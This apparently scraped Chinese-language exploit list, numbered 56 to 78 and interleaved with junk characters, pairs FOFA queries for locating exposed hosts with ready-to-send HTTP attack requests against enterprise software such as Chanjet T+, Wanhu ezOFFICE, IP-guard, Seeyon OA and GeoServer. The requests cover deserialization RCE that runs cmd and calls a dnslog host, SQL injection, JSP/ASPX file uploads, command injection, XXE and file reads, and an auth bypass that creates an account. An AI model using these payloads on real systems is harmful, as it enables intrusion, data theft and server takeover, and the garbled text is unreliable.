# {0 v1 K6 w% Q6 f5 O) x, _56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
: N7 y/ D- W6 f/ ^0 ^FOFA: app="畅捷通-TPlus"8 Y, K; l# O3 ]( f: {
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
/ r+ K8 E1 ]8 I6 q/ v0 B% LHost: x.x.x.x9 f! \7 L' G2 {2 V5 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
! t  t$ v- v7 tContent-Type: application/json
2 K. x5 I3 P' [6 f3 x) ?* v. V; t
{
) J8 e$ f' P( o( i" E  "storeID":{8 T9 F. ]; Q: X, @$ F& M3 B
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",' _' T4 P$ D5 {+ c( t
   "MethodName":"Start",
1 H. B, I8 ?" O$ @    "ObjectInstance":{
) S$ q5 v# B4 W; X0 Z: t$ O4 G       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 H: ~8 n# O% `. \        "StartInfo": {$ `, Y3 _3 q0 E( U; \) ]
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",, A  Q. [& w5 s; D$ P5 m/ B
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
3 d, n6 d2 \% J7 }$ X       }
. N9 A0 L+ n# G  @0 D    }
; n- c( v; e) t; @. f) [  }
) S) ^' m/ A$ Y; \5 d}
# K% P5 A7 [6 u- q& c8 }2 M+ F" q/ R% ~
  V) [# @  G4 f3 V; x4 y3 {6 |
57. 畅捷通T+ keyEdit.aspx SQL注入
/ w9 z) G% k: F0 h8 A9 T! R* Y( C  A: FFOFA:app="畅捷通-TPlus"
9 U& V0 w; y' c5 f  Q& gGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1, i; ]  J5 x( F9 T( p7 |# C4 @
Host: host
4 \# C7 X& \& G4 d2 D0 U) f& o0 ~1 D5 @User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
$ u1 o" K: X3 l$ `. w, }  {Accept-Charset: utf-84 o) o- k/ J" x+ g
Accept-Encoding: gzip, deflate
) B& v" {1 O) X' vConnection: close
, P7 y" K8 n, d9 u
/ H1 ], s9 ^+ v2 r) b
' P. K1 Y# o% C6 i; j9 q$ J; l58. 畅捷通T+ KeyInfoList.aspx sql注入
' Y* n% k1 M5 |) |; TFOFA:app="畅捷通-TPlus"' I- m$ [; [- [/ G! A! ]# i, z. Q
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1) N; x* ]( }: L' D% [5 g; g
Host: your-ip
! p- Y& F4 F6 s. H# B6 RUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
, Z3 ~9 H) S! C/ k' ^1 j5 UAccept-Charset: utf-85 o) o$ Z) F& S# {0 h
Accept-Encoding: gzip, deflate
2 ^# ~+ D) V% K# s* uConnection: close" U- x8 j' F. m  K& }
! d8 _6 @/ a9 i$ }' z) a
/ j3 M) }& |* r  n/ H
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行; T! @: H& j  l, A
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"# k$ I8 I, l3 Z3 E
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1! X- U: L: _5 T& c
Host: 192.168.86.128:9090. @/ v: u% J5 x% J7 o0 ?4 n8 b
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
5 Q. z2 ]- t& R, J5 xConnection: close
( n+ ~8 u8 I3 m) C+ |! f- \Content-Length: 1669! P2 @3 W( _# Q
Accept: */*, P$ e7 m# j: A
Accept-Language: en7 J+ C9 N) Y* Q# K6 D
Content-Type: application/x-www-form-urlencoded" S  b9 q% \& ?4 b
Accept-Encoding: gzip
" C& B7 n/ l5 I& y
2 o  Y/ h* z, u" k4 ~1 n- vPAYLOAD
  Y$ O8 @5 z# x$ c2 r5 s' l- r0 }" N0 X7 r( j

# n5 P% M  Q! u# H' M& K3 q. A% G60. 百卓Smart管理平台 importexport.php SQL注入3 s9 ~# z- Q* U. S' K5 a# \0 E& {
FOFA:title="Smart管理平台"+ l; u; p; Y  j
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
3 q  d0 a' R# P- ZHost:
* n- {, r% ]- P) U& bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( r7 v3 X6 d* j$ S. I) @; s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- b% b$ J: G: L1 i
Accept-Encoding: gzip, deflate0 J- c( k7 {/ o2 k) N, U5 C
Accept-Language: zh-CN,zh;q=0.95 `9 e( `9 d/ P/ v/ Q4 ]8 `
Connection: close3 ~1 q+ }: T' c2 F, Z3 h$ A

; Z' x  x; A+ b# h# ]
$ O/ h& k+ r- H61. 浙大恩特客户资源管理系统 fileupload 任意文件上传- O0 U9 \7 v5 I/ P: v* l
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
$ y% \4 u) \' B+ X- B7 X4 lPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.13 p5 \1 ~" R! S; B
Host: x.x.x.x
  }; g& Z# G; }  {, KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( I/ I% {) S4 q' KConnection: close
1 s" k  w8 z+ t2 G& FContent-Length: 27% L) m& A$ C8 W0 Y
Accept: */*& d4 m- w  O0 K2 \
Accept-Encoding: gzip, deflate
- @; G4 M& w, f/ {Accept-Language: en% A" j: A6 A: \( d. z1 |+ g
Content-Type: application/x-www-form-urlencoded
; Y9 C* v0 [  p& G" ]$ Q4 n" C
7 {9 C0 s9 [& Y8uxssX66eqrqtKObcVa0kid98xa' T/ [6 {( O' H7 F
$ M/ z$ p% u- `: R2 v

3 ]2 o' D! Q7 w8 l4 V; m% a62. IP-guard WebServer 远程命令执行
# x, V# I$ R9 P$ n1 {& VFOFA:"IP-guard" && icon_hash="2030860561"7 j! h8 U& U- ~. X1 z+ g8 u8 X
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.16 @1 _0 r5 T. C5 k2 {5 I7 z6 ^+ w. b
Host: x.x.x.x# e2 c7 F( b! ^! t% ?
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
0 E/ H( `) c  K4 q: _$ }1 R9 s( bConnection: close
. E/ ?2 Q& ~# C! rAccept: */*# r, z. Z5 H0 S* E+ }. `
Accept-Language: en- N0 _5 U5 S5 d
Accept-Encoding: gzip1 ?9 T" W: s. ]' j$ T
3 V9 A* t4 W+ i& h( |

* B4 c3 A' ~8 w' x% Z* M2 k+ p  E访问" e+ m8 C6 Y( h3 ?1 h! O) p1 a- X

0 u# d; n* L3 g$ iGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1  Q: v8 x4 Y2 _  u0 n. Q
Host: x.x.x.x0 V! S+ R' `, V% [* }7 I0 X9 i

; d- x# G6 [" z/ z2 R& T1 j* }7 ?/ K7 Y) K3 _6 U. g
63. IP-guard WebServer任意文件读取* h  `( O) h6 f0 i* ^& \: c
IP-guard < 4.82.0609.03 z! Z- K5 [( q* C  O8 }' b
FOFA:icon_hash="2030860561"5 U! e* l7 ?. Z
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.10 ~! c, c* I; Z- D
Host: your-ip% d. T) ?% w7 x+ [9 }5 Z5 ?; d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36* Q: o6 i5 y! w  {5 V( R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- Q, l( N+ E' l2 v" i& g- C2 c" kAccept-Encoding: gzip, deflate: g* V: _: U3 I# y
Accept-Language: zh-CN,zh;q=0.94 T8 ^  u( q- Y0 B8 [) [
Connection: close9 R4 o2 ~+ s0 V. i& {0 U
Content-Type: application/x-www-form-urlencoded
$ v( l) O. V3 ]6 h- K0 R- L" ]  Q: k0 X! n6 l4 A
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A. p7 y8 F$ o8 j0 v8 D0 R

9 ]/ h0 S" d( y+ A) r% W& A64. 捷诚管理信息系统CWSFinanceCommon SQL注入( f8 g& _$ P- l1 ^
FOFA:body="/Scripts/EnjoyMsg.js"
9 g) I" G6 q. n- M* N! OPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
& i# C* z, |% s/ o8 AHost: 192.168.86.128:9001
* b8 N! b6 P" ~8 Z8 ZUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.361 ~, ]+ w! C4 h# o8 Y. r
Connection: close
' M" k1 w3 X, U5 G6 m( j+ D' b- |Content-Length: 369; R* a; Y; A; R$ _
Accept: */*0 Z- K' l: D. z# Y1 {. J
Accept-Language: en8 Q& c3 p- S; P  @3 Y- E
Content-Type: text/xml; charset=utf-8
$ [4 N" `/ B' W8 a6 q  o7 W. BAccept-Encoding: gzip
# C& `& c5 }8 {8 F% r
; I2 `% x4 n+ [1 F<?xml version="1.0" encoding="utf-8"?>
5 {3 f' s! x7 g- C4 Z<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' w. _# _" t' ?, e( J+ u0 U<soap:Body>
4 f" Y$ \. F7 M2 X4 t4 l    <GetOSpById xmlns="http://tempuri.org/">1 M' u/ Q. i& d- ^, U
      <sId>1';waitfor delay '0:0:5'--+</sId>2 c$ s9 N3 F7 Q$ n5 {
    </GetOSpById>
- |0 |1 q3 f. s: d# B  </soap:Body>; q: N) [+ n3 C
</soap:Envelope>
$ u$ H% X$ B5 i2 E
" a  Q7 J/ y5 Q, P. F, b! f
" m6 f, Y1 [* y0 x9 J65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过( ~3 U. ]( R2 ~% }; j) o2 E6 L
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"; I# Z! F; _$ G  }% J
响应200即成功创建账号test123456/123456
, l4 n9 }! r+ R' wPOST /SystemMng.ashx HTTP/1.11 c+ Y4 f6 Z6 @  }3 @
Host:
- R( e' z8 O8 p9 [5 E5 m4 C* Q; AUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)( q- n$ a8 u* j
Accept-Encoding: gzip, deflate4 i6 ?, r  l' w$ t1 Q: _
Accept: */*8 F5 ^' L: E& {. v* E0 ]& V+ K
Connection: close
9 C6 H: l/ u9 f* G# R! ?; KAccept-Language: en
$ Q  f+ e6 {& ^Content-Length: 174
' q8 U) ]4 P  b
  D( J* x! N9 A5 `: w0 ZoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators! n6 N7 Z3 I5 @" v7 d' |# {2 d8 ?
$ N$ w/ f2 Z( F" I, m. m1 k9 X5 b
, {: F" L0 V2 o$ M; g
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入6 C. d$ i8 T7 }" g( w( P: p/ \
FOFA:app="万户ezOFFICE协同管理平台". \7 u  G7 M4 W& x5 |% p$ L  _" I- n
# z9 H5 u/ T  A, _, j
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1: K) m1 v) B$ r) _) g3 P" n
Host: x.x.x.x2 {2 G3 r+ Q. g* ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36% h( ^4 c% e1 V$ S$ l0 o
Connection: close
" C& q" {4 k5 z' K, T' gAccept: */*
* S( m4 h9 ]4 W3 C) y1 l1 x7 OAccept-Language: en  S: t2 L& m5 W/ T  {
Accept-Encoding: gzip" g( K! v$ E* }( \: n0 z8 G
5 i2 k4 q7 K. ^3 C( p. W2 C2 Q7 Z
/ L, g9 @0 F) X5 q; e$ p9 m3 E
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在$ `9 F9 Y. i5 y
1 m% ]( e' G, Q# P5 p
67. 万户ezOFFICE wpsservlet任意文件上传) n0 E% H8 v7 m# Y
FOFA:app="万户网络-ezOFFICE"
8 k3 x3 a  o) g( OnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型8 `& n% z8 x. O$ I  @
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1$ G' k  U( L9 o! ~& {3 w0 @
Host: x.x.x.x
: V4 G  D2 n+ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
6 Z1 }, r3 ^! w, H$ PContent-Length: 173
5 I7 }7 U, s2 I+ T/ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.80 t6 \* j- S; y2 U, w
Accept-Encoding: gzip, deflate
/ F% V( }/ {2 BAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
7 J+ z2 W) v( AConnection: close
! `1 ?& w9 l! E/ QContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
# |7 W3 K3 e6 tDNT: 1
5 V: F: z2 D9 |+ NUpgrade-Insecure-Requests: 1
# p3 X2 I3 ?7 n# x* X
) t- A5 K" W$ k' O# g  E$ ~--ufuadpxathqvxfqnuyuqaozvseiueerp
; E( m% t7 w, Y, Z( ]' D/ t) KContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"& k+ g% u: v* F' g
* U2 ?; z  |: r& A' F
<% out.print("sasdfghjkj");%>9 ?0 d7 X3 n% v- I1 x& Q7 P
--ufuadpxathqvxfqnuyuqaozvseiueerp--3 F" H# O/ W$ F4 z7 S+ R
) ?2 a' _( a4 S# Z- V2 h

& K, y- o; e/ w( |! }+ r文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp* S5 \8 r) l" P# a* f3 W! @
8 `2 @* q' {0 F0 ?: j# N
68. 万户ezOFFICE wf_printnum.jsp SQL注入2 y: I# S! l8 G- S2 `4 Y/ L7 j
FOFA:app="万户ezOFFICE协同管理平台"$ W* q, i% S5 B- H0 l+ o4 S, x- V
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.19 B8 v9 G! C. u
Host: {{host}}
: [9 P0 b8 P" S, ]1 h6 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
/ K. j5 }' W) A( e0 K; ZAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.85 L# d& J% j6 I: }; E4 j3 i
Accept-Encoding: gzip, deflate
4 [4 A6 M0 m/ i, HAccept-Language: zh-CN,zh;q=0.92 A% f' n, x$ v$ E+ Z# L8 h( j
Connection: close
/ W' Z, p' M' i; p6 a% k
  z8 w) X. K% M! @
% e- G/ i  k: n69. 万户 ezOFFICE contract_gd.jsp SQL注入
' k7 }9 h5 w2 x: OFOFA:app="万户ezOFFICE协同管理平台"
9 p- M* S0 Q# h& a# }/ LGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1% S5 Z2 q4 U( ]  m' R: ]* Y
Host: your-ip
: V* U& j! ]8 _7 {0 ~% fUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36. u2 J- g# u7 R0 ^0 u
Accept-Encoding: gzip, deflate+ S% W: H' O# ~  R$ K3 t
Accept: */*: {; C' @$ Q8 Z) Y  i
Connection: keep-alive$ q+ w; `: F0 q4 m

8 ?5 G' V' o' y' D9 |3 W
' [. G7 e+ G* i* p$ y3 B70. 万户ezEIP success 命令执行: r( L. @6 N7 f  V. p' T: P
FOFA:app="万户网络-ezEIP"
6 n; Q% \7 ^( A/ }/ MPOST /member/success.aspx HTTP/1.11 {( W: _1 i4 O" ^" D+ b7 r- y
Host: {{Hostname}}
7 x- F, k2 O7 i8 j# V* HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36; M, S: d5 a7 P4 F2 F8 U
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=8 x- C0 S+ y9 o2 f3 y
Content-Type: application/x-www-form-urlencoded
  W6 S0 A* W1 H. o$ kTYPE: C
+ J9 k6 W# w4 A" {Content-Length: 167026 H4 k) G3 t9 k0 Z
- _3 A  |3 X+ K5 @' a3 G
__VIEWSTATE=PAYLOAD
# ?! d9 Q% v  j1 r* j2 Y. s4 U( S9 w1 z

( o5 z4 S, y0 v, ^% Y71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入* f; s, J, n/ c2 P; Y7 ?/ }
FOFA:body="PM2项目管理系统BS版增强工具.zip"4 w" Q, Y( o) w/ Z4 ~/ @6 B& s+ q$ t0 x
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
" n/ O9 [; A5 t" d9 s' WHost: x.x.x.xx.x.x.x+ Q* }# l/ H3 v$ {9 s& j& u
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
: A8 V% k1 u# U3 c- WConnection: close
+ o9 P7 r3 K$ J6 z' NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ \! [- D" p) ]0 q  K# N8 i
Accept-Encoding: gzip, deflate/ H' c9 _' W; ~3 ]' A$ |- b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# E# Y- b; a6 u6 T5 ]8 PUpgrade-Insecure-Requests: 1
1 m1 k8 a& X2 i
* W. o/ X3 k1 t8 N; g8 R2 N2 w9 \4 i/ F9 h" U4 ^+ L7 j
72. 致远OA getAjaxDataServlet XXE, |7 C' q+ d- i, _
FOFA:app="致远互联-OA"
- _! W* h" ^0 W$ ^# h: cPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.10 m: c' e9 e. c. k7 B7 S
Host: 192.168.40.131:8099$ _+ q5 x9 k. P: T  ^
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
0 g8 V; `/ _) e: H9 {: W0 PConnection: close
4 e- B: \& |0 }3 U" u3 yContent-Length: 583
/ d; x3 J/ D" `6 C7 ^Content-Type: application/x-www-form-urlencoded
, v- p7 Z6 h2 G( C1 j4 BAccept-Encoding: gzip: \- i$ ~9 T5 V

4 \( h. W1 Y3 g0 Q$ t1 T" X; vS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E) r% g9 l+ }* z
3 M+ w) r* Q0 @9 I1 o% }
$ t' ?. u: E$ {
73. GeoServer wms远程代码执行/ z% w: Z; Y* U2 w! W+ q* i6 ]6 E
FOFA:icon_hash=”97540678”
7 @! T7 _. y2 T* BPOST /geoserver/wms HTTP/1.1
, \% O6 {$ v8 i1 f* T- cHost:% @. f" u6 c, Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 K4 D/ K% S3 U; N& w' \2 F( S; g" XContent-Length: 1981
4 c5 k) d  d8 dAccept-Encoding: gzip, deflate9 h% `. N" P8 i
Connection: close! ?5 B6 |' |4 _- C0 F* @; V
Content-Type: application/xml
& P: y# n: @9 g: S4 [& S9 zSL-CE-SUID: 3# J2 `# T# q# _, Q; Y8 B0 A
6 `: @6 j" H% N+ q. }0 ~
PAYLOAD
0 G" g6 G; G$ o4 H! m+ c: K
( Q' J: r) G1 _: ]$ G$ G) E3 Q: h
7 j" `: {% N; Z8 s" l74. 致远M3-server 6_1sp1 反序列化RCE* G  E/ l- Y4 t! Z' ^3 q
FOFA:title="M3-Server"
. {" N+ f" U, {% ^6 vPAYLOAD
8 k. n" U9 k/ E7 b$ q) k; n5 t6 t6 V+ a8 T5 e5 S- g" `
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE" f, a( D. C3 h& ]  @; f2 u
FOFA:app="TELESQUARE-TLR-2005KSH"% O: L% Q! W& J, I! O* n
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
# R/ k: i5 O" e4 ZHost: x.x.x.x7 i; G& a- d8 m( l3 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 U$ K( o0 s; j5 ~1 R1 r+ g
Connection: close$ F9 o# r# l! s) x
Accept: */*
1 m4 S  S& o' V5 k  u) fAccept-Language: en
/ @; v7 ^: ^3 ZAccept-Encoding: gzip- C3 m$ R5 D/ j9 ]; |5 g+ b

6 i, \# H& L1 J
7 K! T- I. }$ ^GET /cgi-bin/test28256.txt HTTP/1.1
0 {3 h+ ^* T5 F" t8 r9 cHost: x.x.x.x
" }' g" |$ c3 h1 b4 x! C7 e. r

* Y/ \6 N, p2 ^/ M76. 新开普掌上校园服务管理平台service.action远程命令执行! M5 H# F4 F8 j
FOFA:title="掌上校园服务管理平台"% J& W( e" ~% Y. o
POST /service_transport/service.action HTTP/1.1: v, M3 N( _# R. \$ I* {
Host: x.x.x.x" p* i8 L9 ~& L. e& P( t7 |0 @  c2 A! q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
; {% H5 i, p  f6 j( mConnection: close* z" P: [$ ^8 Q3 ~) l- p& Y/ }
Content-Length: 211
# }! D  b0 h& H& g& pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 Q+ F0 E) F) P8 S# a6 b6 [" ?. |  sAccept-Encoding: gzip, deflate
3 w, ~# k6 L6 W, U! ^6 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. q$ \) t  f( o) Q; G& A5 L  B0 JCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
$ w- ?+ {0 s" J% h! N! rUpgrade-Insecure-Requests: 1% A3 O, f$ l3 z+ S3 A8 I6 f8 |

& I& r3 P8 T. q{: a0 C! V0 m6 m( T5 a* e
"command": "GetFZinfo",
5 H! d! j- `0 H" A  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
9 D1 g) D* q. Y  [8 m- i  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"! _( q6 \1 g* L9 t7 _
}6 V; C# T+ |$ R. G, [% \
$ C6 m% z3 o9 L/ z! |( d8 Y

' V3 B3 d! i4 y8 _6 XGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1+ J2 u9 Q0 e2 f2 V- |" I
Host: x.x.x.x
8 [' e% o0 W% Q; r) {! |  A" O7 r9 G0 @

# P+ z" G% a1 B; P3 N9 `7 l9 o. B8 r" r9 c6 `9 u( ]5 I
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
) w+ c, J2 Q4 Q' q7 }3 eFOFA:body="F22WEB登陆"
: L! L, F) R) n: G, v0 zPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
5 Q! A; f2 T+ t0 ^: I- OHost: x.x.x.x5 w+ b1 q3 S; r, u" ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- Y" T: U5 x" i1 [, qConnection: close
2 z! H6 B% o/ yContent-Length: 433
0 L0 q, E3 G& ?1 I: n3 SAccept: */*
  b: h  x2 R. |9 ]Accept-Encoding: gzip, deflate' K5 y. \2 N, \
Accept-Language: zh-CN,zh;q=0.95 A: p7 ~; ]3 y" S8 G
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix: G: r6 a4 y2 P& X, z) l
: T$ @, W( u6 m( S" h
------------398jnjVTTlDVXHlE7yYnfwBoix
* ~! B8 m8 W4 {7 TContent-Disposition: form-data; name="folder", i! P, |" k2 I! w- K1 d3 ?, h7 R7 [; I

2 X: R- t  [/ C, g' N/upload/udplog
" u$ _' z. N$ p------------398jnjVTTlDVXHlE7yYnfwBoix+ j& B- G# n& o1 K8 U
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
0 w& F* f' F: G' vContent-Type: application/octet-stream! [9 r' G3 d7 ~, E
# }/ ?/ S; q7 u" \. D+ Q6 u
hello1234567# d. S/ ?( C  G/ T
------------398jnjVTTlDVXHlE7yYnfwBoix
( T  ^; G0 {& x* w5 z) wContent-Disposition: form-data; name="Upload") Y9 ^4 h9 L, I; }6 G/ X
& f, H+ N, V( j% P9 W6 l
Submit Query
' P8 a$ ^0 {& q- Y6 {------------398jnjVTTlDVXHlE7yYnfwBoix--
; o0 l) E4 X( r
6 j$ M  @& I- G7 V- ]
6 S4 B9 w0 k. |5 M  c" v78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传+ X6 Z0 O4 c$ y) P2 q. U  \2 c- X
FOFA:icon_hash="2001627082") H& [3 g/ Y" d% {6 e/ a
POST /Platform/System/FileUpload.ashx HTTP/1.1; H1 ^; A2 v$ A5 o
Host: x.x.x.x$ W) y* a1 J: O1 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 \7 {& |, ?' j3 G2 d
Connection: close8 H) C5 c0 v" Y: t
Content-Length: 336
* G7 z7 ~3 L7 ]( D* v' HAccept-Encoding: gzip3 c3 |, F: X' P2 T. w6 n$ \( U: U
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
" Q& r6 Q! l( ]$ X$ d0 u( E: \5 y( z1 A
5 H" }; \; X( O+ ^, R1 P------YsOxWxSvj1KyZow1PTsh98fdu6l
